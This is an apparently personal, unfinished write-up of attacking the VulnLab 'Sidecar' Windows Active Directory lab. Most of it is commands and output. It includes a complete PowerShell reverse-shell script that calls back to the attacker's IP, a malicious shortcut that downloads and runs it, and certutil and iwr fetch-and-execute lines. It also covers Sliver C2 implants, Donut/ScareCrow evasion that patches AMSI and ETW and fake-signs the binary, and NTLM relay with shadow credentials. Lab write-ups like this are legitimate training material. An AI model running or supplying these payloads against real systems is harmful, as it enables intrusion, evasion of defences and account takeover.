vulnab-sidecar
a very hard Windows machine
Preparing the Shellcode
┌──(puck㉿kali)-[~/vulnlab/sidecar] └─$ cat puckshell.txt function cleanup { if ($client.Connected -eq $true) {$client.Close()} if ($process.ExitCode -ne $null) {$process.Close()} exit} // Setup IPADDR $address = '10.8.2.138' // Setup PORT $port = '443' $client = New-Object system.net.sockets.tcpclient $client.connect($address,$port) $stream = $client.GetStream() $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize $process = New-Object System.Diagnostics.Process $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' $process.StartInfo.RedirectStandardInput = 1 $process.StartInfo.RedirectStandardOutput = 1 $process.StartInfo.UseShellExecute = 0 $process.Start() $inputstream = $process.StandardInput $outputstream = $process.StandardOutput Start-Sleep 1 $encoding = new-object System.Text.AsciiEncoding while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())} $stream.Write($encoding.GetBytes($out),0,$out.Length) $out = $null; $done = $false; $testing = 0; while (-not $done) { if ($client.Connected -ne $true) {cleanup} $pos = 0; $i = 1 while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0) { $string = $encoding.GetString($networkbuffer,0,$pos) $inputstream.write($string) start-sleep 1 if ($process.ExitCode -ne $null) {cleanup} else { $out = $encoding.GetString($outputstream.Read()) while($outputstream.Peek() -ne -1){ $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}} $stream.Write($encoding.GetBytes($out),0,$out.length) $out = $null $string = $null}} else {cleanup}}
Create a malicious link on a Windows pc
i used
powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))
Uploading the malicious link file
└─$ smbclient //DC01.sidecar.vl/Public Password for [WORKGROUP\puck]: Try "help" to get a list of possible commands. smb: \> shares shares: command not found smb: \> ls . D 0 Sun Dec 10 15:29:38 2023 .. DHS 0 Sun Dec 10 15:20:57 2023 Backup D 0 Sun Dec 10 15:29:37 2023 Common D 0 Sun Dec 17 12:09:03 2023 Install D 0 Sun Dec 10 15:51:08 2023 Transfer D 0 Sun Dec 10 15:29:32 2023 6291455 blocks of size 4096. 2227213 blocks available smb: \> cd Common smb: \Common\> ls . D 0 Sun Dec 17 12:09:03 2023 .. D 0 Sun Dec 10 15:29:38 2023 Common.lnk A 1741 Sun Dec 10 15:47:04 2023 Custom D 0 Sun Dec 17 12:14:14 2023 Install.lnk A 1666 Sun Dec 10 15:47:05 2023 Transfer.lnk A 1681 Sun Dec 10 15:47:05 2023 6291455 blocks of size 4096. 2227210 blocks available smb: \Common\> cd Custom smb: \Common\Custom\> ls . D 0 Sun Dec 17 12:14:14 2023 .. D 0 Sun Dec 17 12:09:03 2023 info.txt A 45 Sun Dec 10 17:08:38 2023 6291455 blocks of size 4096. 2227210 blocks available smb: \Common\Custom\> rm *.lnk smb: \Common\Custom\> put hillie3.lnk putting file hillie3.lnk as \Common\Custom\hillie3.lnk (22.8 kb/s) (average 0.4 kb/s) smb: \Common\Custom\> ls . D 0 Wed Jul 17 16:30:06 2024 .. D 0 Sun Dec 17 12:09:03 2023 hillie3.lnk A 2006 Wed Jul 17 16:30:06 2024 info.txt A 45 Sun Dec 10 17:08:38 2023 6291455 blocks of size 4096. 2237771 blocks available smb: \Common\Custom\>
Serving the shell
┌──(puck㉿kali)-[~/vulnlab/sidecar] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.143.214 - - [17/Jul/2024 16:26:20] "GET /rcat.exe HTTP/1.1" 200 - 10.10.143.214 - - [17/Jul/2024 16:30:16] "GET /puckshell.txt HTTP/1.1" 200 - 10.10.143.214 - - [17/Jul/2024 16:32:20] "GET /puckshell.txt HTTP/1.1" 200 - 10.10.143.214 - - [17/Jul/2024 16:33:20] "GET /puckshell.txt HTTP/1.1" 200 -
Getting the shell
┌──(puck㉿kali)-[~/vulnlab/sidecar] └─$ rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.8.2.138] from (UNKNOWN) [10.10.143.214] 49817 Microsoft Windows [Version 10.0.10240] (c) 2015 Microsoft Corporation. All rights reserved. C:\WINDOWS\System32\WindowsPowerShell\v1.0>whoami sidecar\e.klaymore C:\WINDOWS\System32\WindowsPowerShell\v1.0>cd c:\users\ c:\Users>dir Volume in drive C has no label. Volume Serial Number is 442A-8056 Directory of c:\Users 11/30/2023 11:55 PM <DIR> . 11/30/2023 11:55 PM <DIR> .. 01/12/2024 05:59 PM <DIR> Admin 12/02/2023 01:24 PM <DIR> administrator 01/12/2024 05:50 PM <DIR> e.klaymore 11/30/2023 05:49 PM <DIR> Public 0 File(s) 0 bytes 6 Dir(s) 3,720,708,096 bytes free c:\Users>cd e.klaymore c:\Users\e.klaymore>cd desktop c:\Users\e.klaymore\Desktop>dir Volume in drive C has no label. Volume Serial Number is 442A-8056 Directory of c:\Users\e.klaymore\Desktop 12/01/2023 09:26 AM <DIR> . 12/01/2023 09:26 AM <DIR> .. 0 File(s) 0 bytes 2 Dir(s) 3,720,572,928 bytes free c:\Users\e.klaymore\Desktop>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ==================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled c:\Users\e.klaymore\Desktop>net users User accounts for \\WS01 ------------------------------------------------------------------------------- Admin Administrator DefaultAccount Deployer Gast The command completed successfully. c:\Users\e.klaymore\Desktop>
so we have
c:\Users\e.klaymore\Desktop>net user User accounts for \\WS01 ------------------------------------------------------------------------------- Admin Administrator DefaultAccount Deployer Gast The command completed successfully. c:\Users\e.klaymore\Desktop>net user /domain The request will be processed at a domain controller for domain Sidecar.vl. User accounts for \\DC01.Sidecar.vl ------------------------------------------------------------------------------- A.Roberts Administrator E.Klaymore Guest J.Chaffrey krbtgt M.smith O.osvald P.robinson svc_deploy The command completed successfully.
.
c:\temp>certutil.exe -urlcache -f http://10.8.2.138:8000/nc64.exe nc64.exe **** Online **** CertUtil: -URLCache command completed successfully. c:\temp>dir Volume in drive C has no label. Volume Serial Number is 442A-8056 Directory of c:\temp 07/17/2024 05:57 PM <DIR> . 07/17/2024 05:57 PM <DIR> .. 07/17/2024 05:57 PM 45,272 nc64.exe 1 File(s) 45,272 bytes 2 Dir(s) 3,713,388,544 bytes free
Start Sliver C2
┌──(puck㉿kali)-[~/vulnlab/sidecar] └─$ sudo systemctl start sliver [sudo] password for puck: ┌──(puck㉿kali)-[~/vulnlab/sidecar] └─$ sliver Connecting to localhost:31337 ... [*] Loaded 21 aliases from disk [*] Loaded 128 extension(s) from disk .------..------..------..------..------..------. |S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. | | :/\: || :/\: || (\/) || :(): || (\/) || :(): | | :\/: || (__) || :\/: || ()() || :\/: || ()() | | '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R| `------'`------'`------'`------'`------'`------' All hackers gain deathtouch [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df [*] Welcome to the sliver shell, please type 'help' for options [*] Check for updates with the 'update' command sliver > generate --mtls 10.8.2.138 --os windows --arch amd64 --format exe [*] Generating new windows/amd64 implant binary [*] Symbol obfuscation is enabled [*] Build completed in 20s [*] Implant saved to /home/puck/vulnlab/sidecar/EVIL_USUAL.exe sliver >
Let’s donut this file
┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3] └─$ ./donut payload.exe [ Donut shellcode generator v0.9.3 [ Copyright (c) 2019 TheWover, Odzhan [ Instance type : Embedded [ Module file : "payload.exe" [ Entropy : Random names + Encryption [ File type : EXE [ Target CPU : x86+amd64 [ AMSI/WDLP : continue [ Shellcode : "loader.bin" ┌──(puck㉿kali)-[~/vulnlab/sidecar/donut/donut_v0.9.3] └─$ ls donut donut.1 EVIL_USUAL.exe examples lib LICENSE loader.bin payload.exe README.html
Then Scarecrow the file
┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow] └─$ ./ScareCrow -I loader.bin --domain microsoft.com _________ _________ / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __ \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ / / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) / /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/ \/ \/ \/ \/ \/ (@Tyl0us) “Fear, you must understand is more than a mere obstacle. Fear is a TEACHER. the first one you ever had.” [!] Missing Garble... Downloading it now [*] Encrypting Shellcode Using ELZMA Encryption [+] Shellcode Encrypted [+] Patched ETW Enabled [+] Patched AMSI Enabled [+] Sleep Timer set for 2584 milliseconds [*] Creating an Embedded Resource File [+] Created Embedded Resource File With OneNote's Properties [*] Compiling Payload [+] Payload Compiled [*] Signing OneNote.exe With a Fake Cert [+] Signed File Created [+] Binary Compiled [!] Sha256 hash of OneNote.exe: ad60fffef99119074e16c057982bc80cb5b4bf56f97006f6ca3de989d547ddb6 ┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow] └─$ ls Cryptor go.sum Loader main.json README.md ScareCrow.go Struct go.mod limelighter loader.bin OneNote.exe ScareCrow Screenshots Utils ┌──(puck㉿kali)-[~/vulnlab/sidecar/ScareCrow] └─$
got a session, but after uploading SharpHound.exe , my sliver session gets disconnected
sliver > sessions [*] No sessions 🙁 [*] Session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:52:52 CEST sliver > use 2a9abc07-3992-40be-918f-375eee061970 [*] Active session EVIL_USUAL (2a9abc07-3992-40be-918f-375eee061970) sliver (EVIL_USUAL) > info Session ID: 2a9abc07-3992-40be-918f-375eee061970 Name: EVIL_USUAL Hostname: ws01 UUID: ec2f60bf-8718-2ae6-cabf-54c56e35f9d2 Username: SIDECAR\E.Klaymore UID: S-1-5-21-3976908837-939936849-1028625813-1609 GID: S-1-5-21-3976908837-939936849-1028625813-513 PID: 3812 OS: windows Version: 10 build 10240 x86_64 Locale: en-US Arch: amd64 Active C2: mtls://10.8.2.138:8888 Remote Address: 10.10.151.22:49977 Proxy URL: Reconnect Interval: 1m0s First Contact: Thu Jul 18 08:52:52 CEST 2024 (41s ago) Last Checkin: Thu Jul 18 08:52:52 CEST 2024 (41s ago) sliver (EVIL_USUAL) > ls c:\temp (2 items, 33.6 MiB) =========================== -rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024 -rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024 sliver (EVIL_USUAL) > whoami Logon ID: SIDECAR\E.Klaymore [*] Current Token ID: SIDECAR\E.Klaymore sliver (EVIL_USUAL) > upload SharpHound.exe [*] Wrote file to c:\temp\SharpHound.exe sliver (EVIL_USUAL) > ls c:\temp (3 items, 34.6 MiB) =========================== -rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024 -rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024 -rw-rw-rw- SharpHound.exe 1022.0 KiB Thu Jul 18 08:54:33 +0200 2024 sliver (EVIL_USUAL) > upload SharpHound.exe [*] Wrote file to c:\temp\SharpHound.exe sliver (EVIL_USUAL) > ls c:\temp (3 items, 34.6 MiB) =========================== -rw-rw-rw- nc64.exe 44.2 KiB Thu Jul 18 08:21:32 +0200 2024 -rw-rw-rw- one.exe 33.6 MiB Thu Jul 18 08:49:01 +0200 2024 -rw-rw-rw- SharpHound.exe 1022.0 KiB Thu Jul 18 08:54:53 +0200 2024 [!] Lost session 2a9abc07 EVIL_USUAL - 10.10.151.22:49977 (ws01) - windows/amd64 - Thu, 18 Jul 2024 08:55:31 CEST [!] Active session disconnected sliver (EVIL_USUAL) > execute-assembly -i -E /SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip"
So we need the beacon.exe in a new lnk file
C:\Windows\System32\cmd.exe /c powershell -c iwr http://10.8.2.138/beacon.exe -o C:\windows\tasks\beacon.exe; C:\windows\tasks\beacon.exe
.
created a working beacon, and transfered it to the box with
certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe
and runned c:\programdata\power.exe on the box
.
┌──(puck㉿kali)-[~/vulnlab/sidecar] └─$ sliver Connecting to localhost:31337 ... [*] Loaded 21 aliases from disk [*] Loaded 128 extension(s) from disk .------..------..------..------..------..------. |S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. | | :/\: || :/\: || (\/) || :(): || (\/) || :(): | | :\/: || (__) || :\/: || ()() || :\/: || ()() | | '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R| `------'`------'`------'`------'`------'`------' All hackers gain persist [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df [*] Welcome to the sliver shell, please type 'help' for options [*] Check for updates with the 'update' command sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 sliver > https --lport 8443 [*] Starting HTTPS :8443 listener ... [*] Successfully started job #2 [!] Job #2 stopped (tcp/https) [!] Job #2 stopped (tcp/https) sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 8443 [*] Beacon f4937c47 sitecar-3 - 10.10.177.38:50444 (ws01) - windows/amd64 - Mon, 14 Oct 2024 20:21:04 CEST sliver > use f4937c47-c290-4c60-a7bc-438fcf292b8d [*] Active beacon sitecar-3 (f4937c47-c290-4c60-a7bc-438fcf292b8d) sliver (sitecar-3) > whoami Logon ID: SIDECAR\E.Klaymore [*] Tasked beacon sitecar-3 (952ffb7c) [+] sitecar-3 completed task 952ffb7c sliver (sitecar-3) >
.
sliver (sitecar-3) > sharp-hound-4 -i -s -t 120 -- -c all,gpolocalgroup [*] Tasked beacon sitecar-3 (15da41ae) sliver (sitecar-3) > ls [*] Tasked beacon sitecar-3 (a86427ba) [+] sitecar-3 completed task a86427ba c:\ProgramData\temp (0 items, 0 B) ================================== [+] sitecar-3 completed task 15da41ae [*] sharp-hound-4 output: 2024-10-23T08:49:59.4279652+02:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound 2024-10-23T08:49:59.8243987+02:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices 2024-10-23T08:49:59.8747021+02:00|INFORMATION|Initializing SharpHound at 8:49 AM on 10/23/2024 2024-10-23T08:50:00.0784908+02:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for Sidecar.vl : DC01.Sidecar.vl 2024-10-23T08:50:48.7730432+02:00|INFORMATION|Saving cache with stats: 295 ID to type mappings. 297 name to SID mappings. 2 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2024-10-23T08:50:48.8487177+02:00|INFORMATION|SharpHound Enumeration Completed at 8:50 AM on 10/23/2024! Happy Graphing! [*] Output saved to /tmp/sharp-hound-4_.2445145387.log sliver (sitecar-3) > ls [*] Tasked beacon sitecar-3 (0b9f5da2) [+] sitecar-3 completed task 0b9f5da2 c:\ProgramData\temp (2 items, 83.9 KiB) ======================================= -rw-rw-rw- 20241023085045_BloodHound.zip 31.2 KiB Wed Oct 23 08:50:48 +0200 2024 -rw-rw-rw- Y2RjZTMzZTktMzhkNS00MDAwLTkwZTUtM2MwNDdmM2QyMzRj.bin 52.7 KiB Wed Oct 23 08:50:48 +0200 2024 sliver (sitecar-3) > download 20241023085045_BloodHound.zip [*] Tasked beacon sitecar-3 (44459e36) [+] sitecar-3 completed task 44459e36 [*] Wrote 31936 bytes (1 file successfully, 0 files unsuccessfully) to /home/puck/vulnlab/sidecar/20241023085045_BloodHound.zip sliver (sitecar-3) >
To be continued …
1st we need to promote our beacon to a session to be able to run execute shellcode
Warning: if we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies
thus like this
sliver > sessions [*] No sessions 🙁 [*] Beacon e5de6c1f sitecar-3 - 10.10.173.118:50379 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:55:46 CEST sliver > use e5de6c1f-8a91-454b-9154-8006649aa751 [*] Active beacon sitecar-3 (e5de6c1f-8a91-454b-9154-8006649aa751) sliver (sitecar-3) > interactive [*] Using beacon's active C2 endpoint: https://10.8.2.138:8443 [*] Tasked beacon sitecar-3 (85062590) [*] Session 23eb3ba7 sitecar-3 - 10.10.173.118:50418 (ws01) - windows/amd64 - Fri, 25 Oct 2024 08:57:02 CEST sliver (sitecar-3) > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39 [*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39) sliver (sitecar-3) > sessions ID Transport Remote Address Hostname Username Operating System Health ========== =========== ===================== ========== ==================== ================== ========= 23eb3ba7 http(s) 10.10.173.118:50418 ws01 SIDECAR\E.Klaymore windows/amd64 [ALIVE] sliver (sitecar-3) > ^C input Ctrl-c once more to exit sliver (sitecar-3) > ^C interrupted
and then run execute-shellcode -i /tmp/UnmanagedPowerShell.bin
sliver (sitecar-3) > ^C interrupted ┌──(puck㉿kali)-[~/vulnlab/sidecar] └─$ sliver Connecting to localhost:31337 ... [*] Loaded 21 aliases from disk [*] Loaded 128 extension(s) from disk ███████╗██╗ ██╗██╗ ██╗███████╗██████╗ ██╔════╝██║ ██║██║ ██║██╔════╝██╔══██╗ ███████╗██║ ██║██║ ██║█████╗ ██████╔╝ ╚════██║██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗ ███████║███████╗██║ ╚████╔╝ ███████╗██║ ██║ ╚══════╝╚══════╝╚═╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ All hackers gain fear [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df [*] Welcome to the sliver shell, please type 'help' for options sliver > sessions ID Transport Remote Address Hostname Username Operating System Health ========== =========== ===================== ========== ==================== ================== ========= 23eb3ba7 http(s) 10.10.173.118:50418 ws01 SIDECAR\E.Klaymore windows/amd64 [ALIVE] sliver > use 23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39 [*] Active session sitecar-3 (23eb3ba7-f85a-49ee-aa5f-2c042f1c4a39) sliver (sitecar-3) > execute-shellcode -i /tmp/UnmanagedPowerShell.bin [*] Started remote shell with pid 2108 PS > dir Directory: C:\temp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 10/25/2024 8:53 AM 24830704 power.exe PS > New-ADIDNSNode -Tombstone -Verbose -Node puck.sidecar.vl -Data 10.8.2.138 VERBOSE: [+] Domain Controller = DC01.Sidecar.vl VERBOSE: [+] Domain = Sidecar.vl VERBOSE: [+] Forest = Sidecar.vl VERBOSE: [+] ADIDNS Zone = Sidecar.vl VERBOSE: [+] Distinguished Name = DC=puck.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-18-01-00-00-00-00-02-58-00-00-00-00-0F-B0-38-00-0A-08-02-8A [+] ADIDNS node puck.sidecar.vl added PS >
.
sliver (sitecar-3) > execute-assembly -i -E /tmp/SharpHound.exe "-c all -d sidecar.vl --outputdirectory C:\windows\tasks --zipfilename out.zip" snip...2024-10-25T12:13:31.9634793+02:00|INFORMATION|Saving cache with stats: 58 ID to type mappings. 59 name to SID mappings. 1 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2024-10-25T12:13:31.9939532+02:00|INFORMATION|SharpHound Enumeration Completed at 12:13 PM on 10/25/2024! Happy Graphing! *] Tasked beacon sitecar-3 (e2afe45b) [+] sitecar-3 completed task e2afe45b
…
we can see that we can’t create new machine accounts [ms-ds-machineaccountquota=0]
sliver (sitecar-3) > inline-execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*" [*] Tasked beacon sitecar-3 (189947d6) sliver (sitecar-3) > execute-assembly /tmp/StandIn_v13_Net45.exe "--object ms-DS-MachineAccountQuota=*" [*] Tasked beacon sitecar-3 (c7f43d96) sliver (sitecar-3) > tasks ID State Message Type Created Sent Completed ========== =========== ======================= ================================ ================================ ================================ c7f43d96 sent InvokeExecuteAssembly Fri, 25 Oct 2024 15:39:01 CEST Fri, 25 Oct 2024 15:39:07 CEST 74051079 sent RegisterExtension Fri, 25 Oct 2024 15:37:55 CEST Fri, 25 Oct 2024 15:37:59 CEST 189947d6 sent CallExtension Fri, 25 Oct 2024 15:37:55 CEST Fri, 25 Oct 2024 15:37:59 CEST a730ea0b completed Download Fri, 25 Oct 2024 15:18:49 CEST Fri, 25 Oct 2024 15:18:56 CEST Fri, 25 Oct 2024 15:18:56 CEST db7bfb31 completed Pwd Fri, 25 Oct 2024 15:18:19 CEST Fri, 25 Oct 2024 15:18:22 CEST Fri, 25 Oct 2024 15:18:22 CEST [+] sitecar-3 completed task c7f43d96 [*] Output: [?] Using DC : DC01.Sidecar.vl [?] Object : DC=Sidecar Path : LDAP://DC=Sidecar,DC=vl [?] Iterating object properties [+] ridmanagerreference |_ CN=RID Manager$,CN=System,DC=Sidecar,DC=vl [+] objectcategory |_ CN=Domain-DNS,CN=Schema,CN=Configuration,DC=Sidecar,DC=vl [+] msds-nctype |_ 0 [+] systemflags |_ -1946157056 [+] minpwdage |_ -864000000000 [+] dscorepropagationdata |_ 1/1/1601 12:00:00 AM [+] uascompat |_ 0 [+] usnchanged |_ 110627 [+] instancetype |_ 5 [+] creationtime |_ 133743100080295319 [+] pwdhistorylength |_ 24 [+] ms-ds-machineaccountquota |_ 0 [+] subrefs |_ DC=ForestDnsZones,DC=Sidecar,DC=vl |_ DC=DomainDnsZones,DC=Sidecar,DC=vl |_ CN=Configuration,DC=Sidecar,DC=vl [+] lockoutduration |_ -18000000000 [+] name |_ Sidecar
.
this means we can’t perform a RBCD Attack https://www.thehacker.recipes/a-d/movement/kerberos/delegations/rbcd#rbcd-on-spn-less-users as we would need another computer or service account which we control
sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin [*] Started remote shell with pid 1652 PS > pwd Path ---- C:\Windows\Tasks
.
# on sliver [server] sliver (sitecar-3) > socks5 start [*] Started SOCKS5 127.0.0.1 1081 # on local machine proxychains -q nxc smb 192.168.100.101 -u 'puck' -p ''
.
Webdav
We first need the authentication request or hash from our machine account. As we cant relay SMB to SMB (or LDAP) we need to change our source to HTTP.
For this we need to enable Webdav (https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient)
We can check the current status using https://github.com/G0ldenGunSec/GetWebDAVStatus/
from session ( not beacon ) run
sliver (sitecar-3) > upload GetWebDAVStatus.exe [*] Wrote file to c:\Windows\Tasks\GetWebDAVStatus.exe sliver (sitecar-3) > execute -o "GetWebDAVStatus.exe" "127.0.0.1" [*] Output: [+] WebClient service is active on 127.0.0.1 sliver (sitecar-3) > execute "cmd.exe" "/c net use h: http://10.8.2.138/blub" [*] Command executed successfully sliver (sitecar-3) >
DNS
Webdav is only working if we use a DNS name for our target, so we first need to add a new DNS entry to the AD. https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing
For this we can use Powermad (https://github.com/Kevin-Robertson/Powermad) even in a new spawned interactive shell
I used this sliver shellcode: https://github.com/mmnoureldin/UnmanagedPowerShell?tab=readme-ov-file which also contains Powermad
warning : If we use the interactive-shellcode session, we need to restart the sliver server afterwards to execute assemblies
So we execute-shellcode -i /payloads/UnmanagedPowerShell.bin , and then we add a dns entry with New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138
.
sliver (sitecar-3) > execute-shellcode -i /payloads/UnmanagedPowerShell.bin [*] Started remote shell with pid 3364 PS > pwd Path ---- C:\Windows\Tasks PS > New-ADIDNSNode -Tombstone -Verbose -Node kali.sidecar.vl -Data 10.8.2.138 VERBOSE: [+] Domain Controller = DC01.Sidecar.vl VERBOSE: [+] Domain = Sidecar.vl VERBOSE: [+] Forest = Sidecar.vl VERBOSE: [+] ADIDNS Zone = Sidecar.vl VERBOSE: [+] Distinguished Name = DC=kali.sidecar.vl,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1E-01-00-00-00-00-02-58-00-00-00-00-62-B1-38-00-0A-08-02-8A [+] ADIDNS node kali.sidecar.vl added PS >
WebDav to LDAP relay
Finally we need to trigger the http authentication with Petitpotam or SpoolSample
- https://github.com/leechristensen/SpoolSample
- https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/webclient
- https://pentestlab.blog/2021/10/20/lateral-movement-webclient/
.
Thus now, we exit, and restart the SliverC2 server
then we execute
execute-assembly -i -E /payloads/payloads/SpoolSample.exe “10.8.2.138 kali.sidecar.vl@80/blub.txt”
inline-execute-assembly /payloads/SpoolSample.exe “10.18.2.138 vulnlab@80/blub.txt”
.
thus
sliver (sitecar-3) > use b31f8184-a729-480c-b757-1ac3a3e67669 [*] Active session sitecar-3 (b31f8184-a729-480c-b757-1ac3a3e67669) sliver (sitecar-3) > whoami Logon ID: SIDECAR\E.Klaymore [*] Current Token ID: SIDECAR\E.Klaymore sliver (sitecar-3) > execute-assembly -i -E /payloads/SpoolSample.exe "10.8.2.138 kali.sidecar.vl@80/blub.txt" [!] rpc error: code = Unknown desc = implant timeout sliver (sitecar-3) >
catch it
┌──(puck㉿kali)-[~/vulnlab/sidecar] └─$ impacket-ntlmrelayx -t ldaps://dc01 --shadow-credentials --shadow-target 'ws01$' Impacket v0.12.0.dev1 - Copyright 2023 Fortra [*] Protocol Client DCSYNC loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client SMB loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client LDAPS loaded.. [*] Running in relay mode to single host [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections [*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.185.38, attacking target ldaps://dc01 [!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP) [-] Authenticating against ldaps://dc01 as SIDECAR/E.KLAYMORE FAILED [*] HTTPD(80): Client requested path: /puckshell.txt
Now at problem error:
The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP).
to be continued …
.